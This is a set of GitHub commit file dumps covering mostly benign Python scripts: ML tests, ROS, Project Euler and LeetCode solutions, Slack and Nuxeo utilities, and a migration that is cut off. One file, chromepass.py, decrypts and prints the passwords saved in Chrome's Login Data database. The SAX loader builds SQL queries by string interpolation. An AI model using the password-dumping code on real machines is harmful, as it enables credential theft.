accs_pystruct, times_pystruct = eval_on_data(X, y - 1, svm, Cs=Cs)
accs_svmstruct, times_svmstruct = eval_on_data(X, y, multisvm, Cs=Cs)
plot_timings(np.array(times_svmstruct) - 35, times_pystruct,
dataset="usps")
plt.show()
| bsd-2-clause | Python |
|
cc19cdc3430df018e3a8fa63abaf796a897a475b | Add naive bayes SQL test. | kwikadi/orange3,kwikadi/orange3,qPCR4vir/orange3,kwikadi/orange3,cheral/orange3,qusp/orange3,marinkaz/orange3,cheral/orange3,qusp/orange3,kwikadi/orange3,kwikadi/orange3,cheral/orange3,marinkaz/orange3,qPCR4vir/orange3,qPCR4vir/orange3,kwikadi/orange3,marinkaz/orange3,cheral/orange3,qusp/orange3,qPCR4vir/orange3,qPCR4vir/orange3,qusp/orange3,marinkaz/orange3,cheral/orange3,marinkaz/orange3,marinkaz/orange3,qPCR4vir/orange3,cheral/orange3 | Orange/tests/sql/test_naive_bayes.py | Orange/tests/sql/test_naive_bayes.py | import unittest
from numpy import array
import Orange.classification.naive_bayes as nb
from Orange.data.discretization import DiscretizeTable
from Orange.data.sql.table import SqlTable
from Orange.data.variable import DiscreteVariable
class NaiveBayesTest(unittest.TestCase):
def test_NaiveBayes(self):
table = SqlTable(host='localhost', database='test', table='iris',
type_hints=dict(iris=DiscreteVariable(
values=['Iris-setosa', 'Iris-versicolor',
'Iris-virginica']),
__class_vars__=['iris']))
table = DiscretizeTable(table)
bayes = nb.BayesLearner()
clf = bayes(table)
# Single instance prediction
self.assertEqual(clf(table[0]), table[0].get_class())
# Table prediction
pred = clf(table)
actual = array([ins.get_class() for ins in table])
ca = pred == actual
ca = ca.sum() / len(ca)
self.assertGreater(ca, 0.95)
self.assertLess(ca, 1.)
| bsd-2-clause | Python |
|
78f89e96adedd1045f900d5f9f95c3eb35c12ca3 | Create routine module with Tool class | BakeCode/performance-testing,BakeCode/performance-testing | performance/routine.py | performance/routine.py |
class Tool:
def __init__(self, config):
pass
| mit | Python |
|
6c0aab6c14539b1cd4eedcd1280bcc4eb35ff7ea | Create poly_talker.py | Shad0wSt4R/poly_crier | poly_talker.py | poly_talker.py | #! /usr/bin/env python
import rospy
from std_msgs.msg import String
from random import randint
def talker():
# List of names to be printed
words = ["Dr. Bushey", "Vamsi", "Jon"]
# Registers with roscore a node called "talker".
# ROS programs are called nodes.
rospy.init_node('talker')
# Publisher object gets registered to roscore and creates a topic.
pub = rospy.Publisher('names', String)
# How fast names will be posted. In Hertz.
rate = rospy.Rate(21)
while not rospy.is_shutdown():
number = randint(0,2)
pub.publish(words[number])
rate.sleep()
if __name__ == '__main__':
try:
talker()
except rospy.ROSInterruptException:
pass
| mit | Python |
|
7b3753428f04c86b95191e76ca2c50b54577411a | add problem 27 | smrmkt/project_euler | problem_027.py | problem_027.py | #!/usr/bin/env python
#-*-coding:utf-8-*-
'''
Euler discovered the remarkable quadratic formula:
n² + n + 41
It turns out that the formula will produce 40 primes for
the consecutive values n = 0 to 39.
However, when n = 40, 40² + 40 + 41 = 40(40 + 1) + 41 is
divisible by 41, and certainly when n = 41, 41² + 41 + 41 is
clearly divisible by 41.
The incredible formula n² − 79n + 1601 was discovered,
which produces 80 primes for the consecutive values n = 0 to 79.
The product of the coefficients, −79 and 1601, is −126479.
Considering quadratics of the form:
n² + an + b, where |a| < 1000 and |b| < 1000
where |n| is the modulus/absolute value of n
e.g. |11| = 11 and |−4| = 4
Find the product of the coefficients, a and b,
for the quadratic expression that produces the maximum number of
primes for consecutive values of n, starting with n = 0.
'''
import math
import timeit
def loop(i):
(ma, mb, mn) = (0, 0, 0)
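    # b must itself be prime (n = 0 evaluates to b); restricting a to the same
    # +/- prime list is a pruning heuristic that still covers the known answer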
primes = [j for j in range(-i+1, i) if is_prime(abs(j))]
for a in primes:
for b in primes:
n = 0
while is_prime(n**2+a*n+b):
n += 1
(ma, mb, mn) = (a, b, n) if mn < n else (ma, mb, mn)
return ma, mb, mn, ma*mb
def is_prime(n):
if n < 2:
return False
for i in range(2, int(math.sqrt(n))+1):
if n % i == 0:
return False
return True
if __name__ == '__main__':
print loop(1000)
print timeit.Timer('problem_027.loop(1000)', 'import problem_027').timeit(1) | mit | Python |
|
f530fb3ebe5639d7d6dfe013c5abc70769009a04 | add script | malaterre/dicom-private-dicts,malaterre/dicom-private-dicts,malaterre/dicom-private-dicts | collapse.py | collapse.py | #!/usr/bin/env python
import json
import sys
import argparse
import xmldict
f='bla.json'
ref=2
out=[]
with open(f) as data_file:
pages = json.load(data_file)
for page in pages:
data = page['data']
lineIter = iter(data)
oldline = None
for line in lineIter:
ref_line = line[ref]['text']
if not ref_line:
#print "bla"
if oldline:
for cellold,cellnew in zip(oldline,line):
cellold['text'] = ' '.join( [cellold['text'] , cellnew['text']]).rstrip()
else:
if oldline:
out.append( oldline )
                oldline = line
        # flush the last accumulated row of the page so it is not dropped
        if oldline:
            out.append(oldline)
#print out
print json.dumps(out, sort_keys=True, indent=4)
#for line in data:
# print line[ref]['text']
# #for cell in line:
# # print cell['text']
# #print line['text']
| bsd-3-clause | Python |
|
e9451a8b2d196353e393d265482e37faa651eb1e | Tue Nov 4 20:46:16 PKT 2014 Init | hassaanaliw/chromepass | chromepass.py | chromepass.py | from os import getenv
import sqlite3
import win32crypt
appdata = getenv("APPDATA")
connection = sqlite3.connect(appdata + "\..\Local\Google\Chrome\User Data\Default\Login Data")
cursor = connection.cursor()
cursor.execute('SELECT action_url, username_value, password_value FROM logins')
for information in cursor.fetchall():
#chrome encrypts the password with Windows WinCrypt.
#Fortunately Decrypting it is no big issue.
    # CryptUnprotectData returns a (description, decrypted_data) tuple
    password = win32crypt.CryptUnprotectData(information[2], None, None, None, 0)[1]
    if password:
print 'website_link ' + information[0]
print 'Username: ' + information[1]
print 'Password: ' + password
| mit | Python |
|
0c38c72ef0bc337677f80f0b087ffa374f211e37 | Create saxparser.py | RDBinns/datactrl | saxparser.py | saxparser.py | #!/usr/bin/python
import sys
import xml.sax
import io
import MySQLdb
class MyHandler(xml.sax.ContentHandler):
def __init__(self):
xml.sax.ContentHandler.__init__(self)
self.db = MySQLdb.connect(host="localhost", user="root", passwd="", db="registerdb2011")
self.cursor = self.db.cursor()
self.buffer = []
self.ctrlId = 0
self.purposeId = 0
def getCharacters(self):
data = ''.join(self.buffer).strip()
self.buffer = []
return data.strip()
def characters(self, name):
self.buffer.append(name)
def endElement(self, name):
data = self.getCharacters()
if name == "DATA_CTLR_NAME":
self.ctrlId = self.ctrlId +1
self.insertDatactrl(data)
elif name == "OTHER_NAME":
self.insertOthername(data)
elif name == "PURPOSE" and data != "":
self.purposeId = self.purposeId +1
self.insertPurpose(data)
elif name == "PURPOSE_TEXT":
self.insertPurposeOthername(data)
elif name == "CLASS":
self.insertPurposeClass(data)
elif name == "RECIPIENT":
self.insertPurposeRecipient(data)
elif name == "TRANSFER":
self.insertPurposeTransfer(data)
elif name == "SUBJECT":
self.insertPurposeSubject(data)
def insertDatactrl(self, data):
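        # note: interpolating values straight into the SQL string breaks on quotes;
        # MySQLdb parameter binding is safer, e.g.
        #   self.cursor.execute('insert into datactrl(datactrl_id, datactrl_name) values(%s, %s)',
        #                       (self.ctrlId, data))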
self.cursor.execute('insert into datactrl(datactrl_id, datactrl_name) values("%s", "%s")' % (self.ctrlId, data))
self.db.commit()
sys.stdout.write("inserted datactrl %s %s\n" % (self.ctrlId, data))
def insertOthername(self, data):
self.cursor.execute('insert into datactrl_othernames(datactrl_id, othername) values("%s", "%s")' % (self.ctrlId, data))
def insertPurpose(self, data):
self.cursor.execute('insert into purpose(purpose_id, datactrl_id, purpose_name) values("%s", "%s", "%s")' % (self.purposeId, self.ctrlId, data))
def insertPurposeClass(self, data):
self.cursor.execute('insert into purpose_classes(purpose_id, datactrl_id, class) values("%s", "%s", "%s")' % (self.purposeId, self.ctrlId, data))
def insertPurposeOthername(self, data):
self.cursor.execute('insert into purpose_othernames(purpose_id, datactrl_id, othername) values("%s", "%s", "%s")' % (self.purposeId, self.ctrlId, data))
def insertPurposeRecipient(self, data):
self.cursor.execute('insert into purpose_recipients(purpose_id, datactrl_id, recipient) values("%s", "%s", "%s")' % (self.purposeId, self.ctrlId, data))
def insertPurposeSubject(self, data):
self.cursor.execute('insert into purpose_subjects(purpose_id, datactrl_id, subject) values("%s", "%s", "%s")' % (self.purposeId, self.ctrlId, data))
def insertPurposeTransfer(self, data):
self.cursor.execute('insert into purpose_transfers(purpose_id, datactrl_id, transfer) values("%s", "%s", "%s")' % (self.purposeId, self.ctrlId, data))
handler = MyHandler()
stream = io.open("register_31072011.xml", "r")
xml.sax.parse(stream, handler)
| apache-2.0 | Python |
|
cf9b6b477e6d044e4065086f98906a0eb4504ff3 | Add slack_nagios script | al4/python-slack_nagios | slack_nagios.py | slack_nagios.py | #!/bin/python
import argparse
import requests
"""
A simple script to post nagios notifications to slack
Similar to https://raw.github.com/tinyspeck/services-examples/master/nagios.pl
But adds proxy support
Note: If your internal proxy only exposes an http interface, you will need to be running a modern version of urllib3.
See https://github.com/kennethreitz/requests/issues/1359
Designed to work as such:
slack_nagios.py -field slack_channel=#alerts -field HOSTALIAS="$HOSTNAME$" -field SERVICEDESC="$SERVICEDESC$" -field SERVICESTATE="$SERVICESTATE$" -field SERVICEOUTPUT="$SERVICEOUTPUT$" -field NOTIFICATIONTYPE="$NOTIFICATIONTYPE$"
slack_nagios.py -field slack_channel=#alerts -field HOSTALIAS="$HOSTNAME$" -field HOSTSTATE="$HOSTSTATE$" -field HOSTOUTPUT="$HOSTOUTPUT$" -field NOTIFICATIONTYPE="$NOTIFICATIONTYPE$"
"""
def send_alert(args):
if args.proxy:
proxy = {
"http": args.proxy,
"https": args.proxy
}
else:
proxy = {}
url = "https://{d}/services/hooks/nagios?token={t}".format(
d=args.domain,
t=args.token
)
payload = {
'slack_channel': "#" + args.channel
}
for field in args.field:
        key, value = field[0].split('=', 1)
payload[key] = value
req = requests.post(url=url, proxies=proxy, data=payload)
if args.debug:
print(req.text)
print(req.status_code)
return req
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Post nagios notifications to slack")
parser.add_argument('--debug', help="Debug mode", action='store_true')
parser.add_argument('--proxy', '-p', help="Proxy to use, full url format", default=None)
parser.add_argument('--domain', '-d', help="Slack domain to post to", required=True)
parser.add_argument('--channel', '-c', help="Channel to post to", required=True)
parser.add_argument('--token', '-t', help="Auth token", required=True)
parser.add_argument('-field', nargs='*', required=True, action='append',
help="Alert fields (Should be specified more than once)")
args = parser.parse_args()
send_alert(args)
| mit | Python |
|
f437b7875aa4bed06dcf3884bb81c009b7e473f0 | Add 290-word-pattern.py | mvj3/leetcode | 290-word-pattern.py | 290-word-pattern.py | """
Question:
Word Pattern
Given a pattern and a string str, find if str follows the same pattern.
Examples:
pattern = "abba", str = "dog cat cat dog" should return true.
pattern = "abba", str = "dog cat cat fish" should return false.
pattern = "aaaa", str = "dog cat cat dog" should return false.
pattern = "abba", str = "dog dog dog dog" should return false.
Notes:
Both pattern and str contains only lowercase alphabetical letters.
Both pattern and str do not have leading or trailing spaces.
Each word in str is separated by a single space.
Each letter in pattern must map to a word with length that is at least 1.
Credits:
Special thanks to @minglotus6 for adding this problem and creating all test cases.
Performance:
1. Total Accepted: 1839 Total Submissions: 6536 Difficulty: Easy
2. Sorry. We do not have enough accepted submissions.
"""
class Solution(object):
def wordPattern(self, pattern, str):
"""
:type pattern: str
:type str: str
:rtype: bool
"""
patterns = list(pattern)
words = str.split(" ")
if len(patterns) != len(words):
return False
short_to_long = dict()
seen_longs = set([])
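        # a valid mapping is a bijection: each pattern letter maps to exactly one
        # word (short_to_long) and no two letters may share a word (seen_longs)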
for idx, short in enumerate(patterns):
long = words[idx]
if short not in short_to_long:
if long in seen_longs:
return False
short_to_long[short] = long
seen_longs.add(long)
else:
if short_to_long[short] != long:
return False
return True
assert Solution().wordPattern("abba", "dog cat cat dog") is True
assert Solution().wordPattern("abba", "dog cat cat fish") is False
assert Solution().wordPattern("aaaa", "dog cat cat dog") is False
assert Solution().wordPattern("abba", "dog dog dog dog") is False
| mit | Python |
|
f39a640a8d5bf7d4a5d80f94235d1fa7461bd4dc | Add code for stashing a single nuxeo image on s3. | barbarahui/nuxeo-calisphere,barbarahui/nuxeo-calisphere | s3stash/stash_single_image.py | s3stash/stash_single_image.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys, os
import argparse
import logging
import json
from s3stash.nxstashref_image import NuxeoStashImage
def main(argv=None):
parser = argparse.ArgumentParser(description='Produce jp2 version of Nuxeo image file and stash in S3.')
parser.add_argument('path', help="Nuxeo document path")
parser.add_argument('--bucket', default='ucldc-private-files/jp2000', help="S3 bucket name")
parser.add_argument('--region', default='us-west-2', help='AWS region')
parser.add_argument('--pynuxrc', default='~/.pynuxrc', help="rc file for use by pynux")
parser.add_argument('--replace', action="store_true", help="replace file on s3 if it already exists")
if argv is None:
argv = parser.parse_args()
# logging
# FIXME would like to name log with nuxeo UID
filename = argv.path.split('/')[-1]
logfile = "logs/{}.log".format(filename)
print "LOG:\t{}".format(logfile)
logging.basicConfig(filename=logfile, level=logging.INFO, format='%(asctime)s (%(name)s) [%(levelname)s]: %(message)s', datefmt='%m/%d/%Y %I:%M:%S %p')
logger = logging.getLogger(__name__)
# convert and stash jp2
nxstash = NuxeoStashImage(argv.path, argv.bucket, argv.region, argv.pynuxrc, argv.replace)
report = nxstash.nxstashref()
# output report to json file
reportfile = "reports/{}.json".format(filename)
with open(reportfile, 'w') as f:
json.dump(report, f, sort_keys=True, indent=4)
# parse report to give basic stats
print "REPORT:\t{}".format(reportfile)
print "SUMMARY:"
if 'already_s3_stashed' in report.keys():
print "already stashed:\t{}".format(report['already_s3_stashed'])
print "converted:\t{}".format(report['converted'])
print "stashed:\t{}".format(report['stashed'])
print "\nDone."
if __name__ == "__main__":
sys.exit(main())
| bsd-3-clause | Python |
|
12821e2859151e8f949f55b8c363ff95d296a7d0 | add setup.py for python interface | mhdella/libsvm,cypro666/libsvm,dejon97/libsvm,asifmadnan/libsvm,phoenixstar7/libsvm,androidYibo/libsvm,DaveGeneral/libsvm,Adoni/libsvm,cjlin1/libsvm,mhdella/libsvm,Guokr1991/libsvm,ntucllab/hintsvm,sdgdsffdsfff/libsvm,G-P-S/libsvm,phoenixstar7/libsvm,asifmadnan/libsvm,sdgdsffdsfff/libsvm,androidYibo/libsvm,ntucllab/hintsvm,DaveGeneral/libsvm,G-P-S/libsvm,cypro666/libsvm,ntucllab/hintsvm,phoenixstar7/libsvm,caidongyun/libsvm,DaveGeneral/libsvm,dejon97/libsvm,dejon97/libsvm,asifmadnan/libsvm,Guokr1991/libsvm,G-P-S/libsvm,Guokr1991/libsvm,asifmadnan/libsvm,ntucllab/hintsvm,cypro666/libsvm,TKlerx/libsvm,mvtuong/Yelp-Challenge,toothacher17/libsvm,TKlerx/libsvm,mvtuong/Yelp-Challenge,melissa-mccoy/libsvm,phoenixstar7/libsvm,dejon97/libsvm,androidYibo/libsvm,dejon97/libsvm,TKlerx/libsvm,sdgdsffdsfff/libsvm,cypro666/libsvm,ntucllab/hintsvm,Guokr1991/libsvm,mvtuong/Yelp-Challenge,toothacher17/libsvm,sdgdsffdsfff/libsvm,mhdella/libsvm,ChinaQuants/libsvm,melissa-mccoy/libsvm,toothacher17/libsvm,mhdella/libsvm,phoenixstar7/libsvm,mhdella/libsvm,Adoni/libsvm,phoenixstar7/libsvm,Maluuba/libsvm,Maluuba/libsvm,androidYibo/libsvm,cypro666/libsvm,androidYibo/libsvm,melissa-mccoy/libsvm,DaveGeneral/libsvm,G-P-S/libsvm,TKlerx/libsvm,ChinaQuants/libsvm,mvtuong/Yelp-Challenge,ChinaQuants/libsvm,asifmadnan/libsvm,toothacher17/libsvm,caidongyun/libsvm,G-P-S/libsvm,cjlin1/libsvm,Guokr1991/libsvm,Maluuba/libsvm,cjlin1/libsvm,melissa-mccoy/libsvm,asifmadnan/libsvm,Maluuba/libsvm,Adoni/libsvm,DaveGeneral/libsvm,caidongyun/libsvm,toothacher17/libsvm,melissa-mccoy/libsvm,ChinaQuants/libsvm,caidongyun/libsvm,Adoni/libsvm,sdgdsffdsfff/libsvm,dejon97/libsvm,toothacher17/libsvm,melissa-mccoy/libsvm,ChinaQuants/libsvm,androidYibo/libsvm,TKlerx/libsvm,G-P-S/libsvm,TKlerx/libsvm,mhdella/libsvm,ChinaQuants/libsvm,ntucllab/hintsvm,cjlin1/libsvm,caidongyun/libsvm,cjlin1/libsvm,Guokr1991/libsvm,cypro666/libsvm,cjlin1/libsvm,sdgdsffdsfff/libsvm,Maluuba/libsvm,caidongyun/libsvm,DaveGeneral/libsvm,Maluuba/libsvm | python/setup.py | python/setup.py | #!/usr/bin/env python
from distutils.core import setup, Extension
setup(name = "LIBSVM",
version = "2.87",
author="Chih-Chung Chang and Chih-Jen Lin",
maintainer="Chih-Jen Lin",
maintainer_email="[email protected]",
url="http://www.csie.ntu.edu.tw/~cjlin/libsvm/",
description = "LIBSVM Python Interface",
ext_modules = [Extension("svmc",
["../svm.cpp", "svmc_wrap.c"],
extra_compile_args=["-O3", "-I../"]
)
],
py_modules=["svm"],
)
| bsd-3-clause | Python |
|
794b8c32dd0c5bd45bb580a75f6f4da63b689eb6 | Add `find_contentitem_urls` management command to index URL usage | django-fluent/django-fluent-contents,edoburu/django-fluent-contents,edoburu/django-fluent-contents,django-fluent/django-fluent-contents,django-fluent/django-fluent-contents,edoburu/django-fluent-contents | fluent_contents/management/commands/find_contentitem_urls.py | fluent_contents/management/commands/find_contentitem_urls.py | import operator
from functools import reduce
import sys
from django.core.management.base import BaseCommand
from django.db import models
from django.db.models import Q
from django.utils.encoding import force_text
from django.utils import six
from fluent_contents.extensions import PluginHtmlField, PluginImageField, PluginUrlField
from fluent_contents.extensions import plugin_pool
from html5lib import treebuilders, HTMLParser
class Command(BaseCommand):
"""
    Find all link and image URLs used in content items,
    so their usage can be reviewed.
"""
help = "Find all link and image URLs in all content items."
def handle(self, *args, **options):
self.verbosity = options['verbosity']
urls = []
# Look through all registered models.
for model in plugin_pool.get_model_classes():
urls += self.inspect_model(model)
self.stdout.write("")
        for url in sorted(set(urls)):
            self.stdout.write(url)
def inspect_model(self, model):
"""
Inspect a single model
"""
# See which interesting fields the model holds.
url_fields = sorted(f for f in model._meta.fields if isinstance(f, (PluginUrlField, models.URLField)))
picture_fields = sorted(f for f in model._meta.fields if isinstance(f, (PluginImageField, models.ImageField)))
html_fields = sorted(f for f in model._meta.fields if isinstance(f, PluginHtmlField))
if not picture_fields and not html_fields and not url_fields:
return []
all_fields = [f.name for f in (picture_fields + html_fields + url_fields)]
sys.stderr.write("Inspecting {0} ({1})\n".format(model.__name__, ", ".join(all_fields)))
q_notnull = reduce(operator.or_, (Q(**{"{0}__isnull".format(f): False}) for f in all_fields))
qs = model.objects.filter(q_notnull).order_by('pk')
urls = []
for contentitem in qs:
# HTML fields need proper html5lib parsing
for field in html_fields:
value = getattr(contentitem, field.name)
if value:
html_images = self.extract_html_urls(value)
for image in html_images:
self.show_match(contentitem, image)
urls += html_images
# Picture fields take the URL from the storage class.
for field in picture_fields:
value = getattr(contentitem, field.name)
if value:
self.show_match(contentitem, value)
urls.append(force_text(value.url))
# URL fields can be read directly.
for field in url_fields:
value = getattr(contentitem, field.name)
if isinstance(value, six.text_type):
urls.append(value)
else:
urls.append(value.to_db_value()) # AnyUrlValue
return urls
def show_match(self, contentitem, value):
if self.verbosity >= 2:
self.stdout.write("{0}#{1}: \t{2}".format(contentitem.__class__.__name__, contentitem.pk, value))
def extract_html_urls(self, html):
"""
Take all ``<img src="..">`` from the HTML
"""
p = HTMLParser(tree=treebuilders.getTreeBuilder("dom"))
dom = p.parse(html)
urls = []
for img in dom.getElementsByTagName('img'):
src = img.getAttribute('src')
if src:
urls.append(src)
srcset = img.getAttribute('srcset')
if srcset:
urls += self.extract_srcset(srcset)
for source in dom.getElementsByTagName('source'):
srcset = source.getAttribute('srcset')
if srcset:
urls += self.extract_srcset(srcset)
for source in dom.getElementsByTagName('a'):
href = source.getAttribute('href')
if href:
urls.append(href)
return urls
def extract_srcset(self, srcset):
"""
Handle ``srcset="image.png 1x, [email protected] 2x"``
"""
urls = []
for item in srcset.split(','):
if item:
urls.append(item.rsplit(' ', 1)[0])
return urls
| apache-2.0 | Python |
|
fc911a4952a46ea372e1a42cff78351b4f8b42ef | complete 15 lattice paths | dawran6/project-euler | 15-lattice-paths.py | 15-lattice-paths.py | from collections import defaultdict
from math import factorial as fac
if __name__ == '__main__':
# Dynamic programming method
paths = defaultdict(dict)
for i in range(21):
paths[0][i] = 1
paths[i][0] = 1
for i in range(1, 21):
for j in range(1, 21):
paths[i][j] = paths[i-1][j] + paths[i][j-1]
print(paths[20][20])
# Pure math
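    # a 20x20 grid walk is 40 steps of which exactly 20 go right: C(40, 20) = 40!/(20!*20!)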
print(fac(40)//fac(20)//fac(20))
| mit | Python |
|
684387315025bc7789aa75def757894cb8d92154 | add quickie Python JSON-filtering script | tidepool-org/tideline,tidepool-org/tideline | dev/filter_json.py | dev/filter_json.py | # == BSD2 LICENSE ==
# Copyright (c) 2014, Tidepool Project
#
# This program is free software; you can redistribute it and/or modify it under
# the terms of the associated License, which is identical to the BSD 2-Clause
# License as published by the Open Source Initiative at opensource.org.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the License for more details.
#
# You should have received a copy of the License along with this program; if
# not, you can obtain one from Tidepool Project at tidepool.org.
# == BSD2 LICENSE ==
# Usage:
# python filter_json.py <path/to/JSON/file> <filter> <optional/path/to/output/file>
import json
import sys
def main():
o = open(sys.argv[1], 'rU')
try:
output_file = open(sys.argv[3], 'w')
except IndexError:
output_file = open('filter-output.json', 'w')
jsn = json.load(o)
filtered = []
for obj in jsn:
if obj['type'] == sys.argv[2]:
filtered.append(obj)
print >> output_file, json.dumps(filtered, separators=(',',': '), indent=4)
if __name__ == '__main__':
main() | bsd-2-clause | Python |
|
7d20f9bcbfda514c216fb7faaa08325f21c0e119 | add 01 code | xiaxiaoyu1988/leetcode,xiaxiaoyu1988/leetcode | 01-two-snum.py | 01-two-snum.py | class Solution(object):
def twoSum(self, nums, target):
"""
:type nums: List[int]
:type target: int
:rtype: List[int]
"""
for i in range(len(nums)):
last = nums[i]
# print last
for j, num in enumerate(nums[i+1:]):
# print j, num
if last + num == target:
return [i,i+1+j]
| mit | Python |
|
b699a18f8928a6e859ebc34a843e4c8a64a22b26 | add script to grid-search model parameters — script from scikit-learn: http://scikit-learn.org/stable/modules/generated/sklearn.model_selection.GridSearchCV.html#sklearn.model_selection.GridSearchCV | juanmirocks/LocText,juanmirocks/LocText,Rostlab/LocText,juanmirocks/LocText,Rostlab/LocText,Rostlab/LocText | scripts/grid_search_digits.py | scripts/grid_search_digits.py | """
============================================================
Parameter estimation using grid search with cross-validation
============================================================
This examples shows how a classifier is optimized by cross-validation,
which is done using the :class:`sklearn.model_selection.GridSearchCV` object
on a development set that comprises only half of the available labeled data.
The performance of the selected hyper-parameters and trained model is
then measured on a dedicated evaluation set that was not used during
the model selection step.
More details on tools available for model selection can be found in the
sections on :ref:`cross_validation` and :ref:`grid_search`.
"""
from __future__ import print_function
from sklearn import datasets
from sklearn.model_selection import train_test_split
from sklearn.model_selection import GridSearchCV
from sklearn.metrics import classification_report
from sklearn.svm import SVC
print(__doc__)
# Loading the Digits dataset
digits = datasets.load_digits()
# To apply an classifier on this data, we need to flatten the image, to
# turn the data in a (samples, feature) matrix:
n_samples = len(digits.images)
X = digits.images.reshape((n_samples, -1))
y = digits.target
# Split the dataset in two equal parts
X_train, X_test, y_train, y_test = train_test_split(
X, y, test_size=0.5, random_state=0)
# Set the parameters by cross-validation
tuned_parameters = [{'kernel': ['rbf'], 'gamma': [1e-3, 1e-4],
'C': [1, 10, 100, 1000]},
{'kernel': ['linear'], 'C': [1, 10, 100, 1000]}]
scores = ['precision', 'recall']
for score in scores:
print("# Tuning hyper-parameters for %s" % score)
print()
clf = GridSearchCV(SVC(C=1), tuned_parameters, cv=5,
scoring='%s_macro' % score)
clf.fit(X_train, y_train)
print("Best parameters set found on development set:")
print()
print(clf.best_params_)
print()
print("Grid scores on development set:")
print()
means = clf.cv_results_['mean_test_score']
stds = clf.cv_results_['std_test_score']
for mean, std, params in zip(means, stds, clf.cv_results_['params']):
print("%0.3f (+/-%0.03f) for %r"
% (mean, std * 2, params))
print()
print("Detailed classification report:")
print()
print("The model is trained on the full development set.")
print("The scores are computed on the full evaluation set.")
print()
y_true, y_pred = y_test, clf.predict(X_test)
print(classification_report(y_true, y_pred))
print()
# Note the problem is too easy: the hyperparameter plateau is too flat and the
# output model is the same for precision and recall with ties in quality.
| apache-2.0 | Python |
|
3c2316b69fcee9db820937c2814a9872e27f95a9 | Implement frequent direction sketch | hido/frequent-direction | fd_sketch.py | fd_sketch.py | # -*- coding: utf-8 -*-
#!/usr/bin/env python
import numpy as np
import numpy.linalg as ln
import math
import sys
""" This is a simple and deterministic method for matrix sketch.
The original method has been introduced in [Liberty2013]_ .
[Liberty2013] Edo Liberty, "Simple and Deterministic Matrix Sketching", ACM SIGKDD, 2013.
"""
def sketch(mat_a, ell):
"""Compute a sketch matrix of input matrix
Note that \ell must be smaller than m * 2
:param mat_a: original matrix to be sketched (n x m)
:param ell: the number of rows in sketch matrix
:returns: sketch matrix (\ell x m)
"""
# number of columns
m = mat_a.shape[1]
# Input error handling
if math.floor(ell / 2) >= m:
raise ValueError('Error: ell must be smaller than m * 2')
if ell >= mat_a.shape[0]:
raise ValueError('Error: ell must not be greater than n')
# initialize output matrix B
mat_b = np.zeros([ell, m])
# compute zero valued row list
zero_rows = np.nonzero([round(s, 7) == 0.0 for s in np.sum(mat_b, axis = 1)])[0].tolist()
# repeat inserting each row of matrix A
for i in range(0, mat_a.shape[0]):
# insert a row into matrix B
mat_b[zero_rows[0], :] = mat_a[i, :]
# remove zero valued row from the list
zero_rows.remove(zero_rows[0])
# if there is no more zero valued row
if len(zero_rows) == 0:
# compute SVD of matrix B
mat_u, vec_sigma, mat_v = ln.svd(mat_b, full_matrices=False)
# obtain squared singular value for threshold
            squared_sv_center = vec_sigma[int(math.floor(ell / 2))] ** 2
# update sigma to shrink the row norms
sigma_tilda = [(0.0 if d < 0.0 else math.sqrt(d)) for d in (vec_sigma ** 2 - squared_sv_center)]
# update matrix B where at least half rows are all zero
mat_b = np.dot(np.diagflat(sigma_tilda), mat_v)
# update the zero valued row list
zero_rows = np.nonzero([round(s, 7) == 0 for s in np.sum(mat_b, axis = 1)])[0].tolist()
return mat_b
def calculateError(mat_a, mat_b):
"""Compute the degree of error by sketching
:param mat_a: original matrix
:param mat_b: sketch matrix
:returns: reconstruction error
"""
dot_mat_a = np.dot(mat_a.T, mat_a)
dot_mat_b = np.dot(mat_b.T, mat_b)
return ln.norm(dot_mat_a - dot_mat_b, ord = 2)
def squaredFrobeniusNorm(mat_a):
"""Compute the squared Frobenius norm of a matrix
:param mat_a: original matrix
:returns: squared Frobenius norm
"""
return ln.norm(mat_a, ord = 'fro') ** 2
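# --- illustrative usage (a sketch, not part of the library API) --------------
# Assumes a random 1000 x 50 input matrix and ell = 20; per [Liberty2013] the
# reconstruction error ||A'A - B'B||_2 is bounded by 2 * ||A||_F^2 / ell.
if __name__ == '__main__':
    mat_a = np.random.randn(1000, 50)
    ell = 20
    mat_b = sketch(mat_a, ell)
    print('sketch shape: %s x %s' % mat_b.shape)
    print('reconstruction error: %f' % calculateError(mat_a, mat_b))
    print('error bound 2*||A||_F^2/ell: %f' % (2.0 * squaredFrobeniusNorm(mat_a) / ell))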
| bsd-2-clause | Python |
|
fe86df913b79fdf8c3627fe31b87c6dfa3da4f46 | implement QEngine | rajpurkar/chess-deep-rl | engines/QEngine.py | engines/QEngine.py | #!/usr/bin/env python3
from ChessEngine import ChessEngine
import chess
import pickle
import random
import sys
sys.path.append('.')
import data
# assumption (not specified in this file): the Q table encodes an action as
# from_square * NUM_SQUARES + to_square over python-chess's 64 board squares
NUM_SQUARES = 64
class QEngine(ChessEngine):
def __init__(self, picklefile):
super().__init__()
with open(picklefile, "rb") as f:
            self.Q = pickle.load(f)
def search(self):
        s = data.state_from_board(self.board, hashable=True)
        try:
            a = self.Q[s]
from_square = a // NUM_SQUARES
to_square = a % NUM_SQUARES
move = chess.Move(from_square, to_square)
except:
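            # state not in the Q table (or lookup failed): play a random legal move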
moves = list(self.board.generate_legal_moves())
move = random.choice(moves)
self.moves = [move]
if __name__ == "__main__":
engine = QEngine("engines/sarsa_Q_-_.pickle")
engine.run()
| mit | Python |
|
e782e519012c4734f591388114fc954fdc014acf | add thousands_separator in Python to format folder | daltonmenezes/learning-C | src/Python/format/thousands_separator.py | src/Python/format/thousands_separator.py | #!/usr/bin/env python
print " Formated number:", "{:,}".format(102403)
| mit | Python |
|
3e8c18b32058d9d33ae0d12744355bb65c2b96ed | add alembic migration for orders table | wuvt/wuvt-site,wuvt/wuvt-site,wuvt/wuvt-site,wuvt/wuvt-site | migrations/versions/187cf9175cee_add_orders_table.py | migrations/versions/187cf9175cee_add_orders_table.py | """add orders table
Revision ID: 187cf9175cee
Revises: 3d8cf74c2de4
Create Date: 2015-10-23 23:43:31.769594
"""
# revision identifiers, used by Alembic.
revision = '187cf9175cee'
down_revision = '3d8cf74c2de4'
from alembic import op
import sqlalchemy as sa
def upgrade():
### commands auto generated by Alembic - please adjust! ###
op.create_table('orders',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('name', sa.Unicode(length=255), nullable=True),
sa.Column('email', sa.Unicode(length=255), nullable=True),
